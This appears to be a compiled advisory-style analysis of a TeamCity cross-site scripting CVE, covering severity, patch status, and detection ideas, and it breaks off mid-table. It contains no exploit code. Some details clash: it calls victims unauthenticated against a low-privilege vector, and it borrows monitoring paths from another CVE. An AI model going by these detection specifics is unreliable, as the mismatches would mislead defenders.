Comprehensive Analysis of CVE-2024-56355: JetBrains TeamCity XSS Vulnerability

CVE ID: CVE-2024-56355
CVSS Score: 5.4 (MEDIUM)
Publicly Disclosed: 2024-12-20
Last Updated: 2025-01-02

---

1. Vulnerability Overview

CVE-2024-56355 is a cross-site scripting (XSS) vulnerability in JetBrains TeamCity On-Premises versions prior to 2024.12. The flaw arises from a missing Content-Type header in responses generated by the RemoteBuildLogController, enabling injection of malicious scripts into browser sessions[1][6][16].

Key Parameters:

1. CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
2. Attack Complexity: LOW
3. User Interaction: REQUIRED (victim must click a malicious link)
4. Affected Products: cpe:2.3:a:jetbrains:teamcity:::::::* (all versions ≤ 2024.11)[1][5][13]

—

2. Threat Intelligence & Active Exploitation

Active Exploitation Status

As of July 2025, no public reports of CVE-2024-56355 being exploited in the wild exist. Neither threat actor groups nor malware campaigns have been linked to this vulnerability[10][34]. This aligns with its medium severity and the requirement for user interaction[1][16].

Related Security Context

1. CVE-2024-27198/CVE-2024-27199: Critical TeamCity vulnerabilities (CVSS 9.8 and 7.3) patched in March 2024 demonstrated exploitation of authentication bypass and path traversal flaws[2][3][21].
2. CVE-2024-56356: High-risk XML external entity (XXE) vulnerability (CVSS 7.1) in TeamCity ≤ 2024.11, patched in the same release cycle[1][5][31].

—

3. Technical Analysis

Root Cause & Attack Vector

The RemoteBuildLogController fails to enforce a Content-Type header for certain responses, allowing attackers to:

1. Craft malicious URLs: Compromise unauthenticated users via phishing (e.g., attackers inject scripts into build log endpoints).
2. Infect Session Context: Attackers exploit browser-based vulnerabilities, such as:

1. Hijacking authentication tokens
2. Stealing session cookies
3. Executing malicious JavaScript payloads[1][6][34].

Limitations:

1. No Automation: Requires victim interaction (clicking a link).
2. No RCE: Unlike recent critical TeamCity flaws (e.g., CVE-2024-27198), this vulnerability does not enable code execution[3][21].

—

4. Vendor & Industry Response

Patch Information

1. Fixed Version: TeamCity 2024.12 (released December 2024)[24][25].
2. Security Notes: JetBrains addressed multiple XSS, XXE, and protection flaws in 2024.12, including CWE-79 vulnerabilities[25][26].

Disclosure Timeline

| Event | Date | Source |
|—————————|—————-|————————-|
| Vulnerability Discovered | ~December 2024 | JetBrains Internal |
| Patch Released | December 2024 | TeamCity 2024.12 Update |
| CISA KEV Status | Not Included | CISA Bulletin [15][48]|

---

5. Detection & Monitoring Strategies

Network/Log Signatures

While no public exploit exists, consider monitoring for:

1. HTTP Requests: To /admin/diagnostic.jsp or /app/https/settings/* with injected scripts (cf. CVE-2024-27199 detection rules)[2].
2. Response Headers: Missing Content-Type in responses from TeamCity.
3. Web Logs: Unusual patterns in build log access or JavaScript errors in TeamCity UI[10][34].

SIEM Queries (Example for Splunk):

sourcetype=http_access src_ip=* http.method=GET http.url="*/RemoteBuildLogController *" http.content_type!=application/json

Behavioral Indicators

| Indicator Type | Description |
|———————-|———————————————|
| Network Traffic | Unusual GET requests to build log endpoints |
| Session Context | Redirection to attacker-controlled domains |
| Payload Analysis |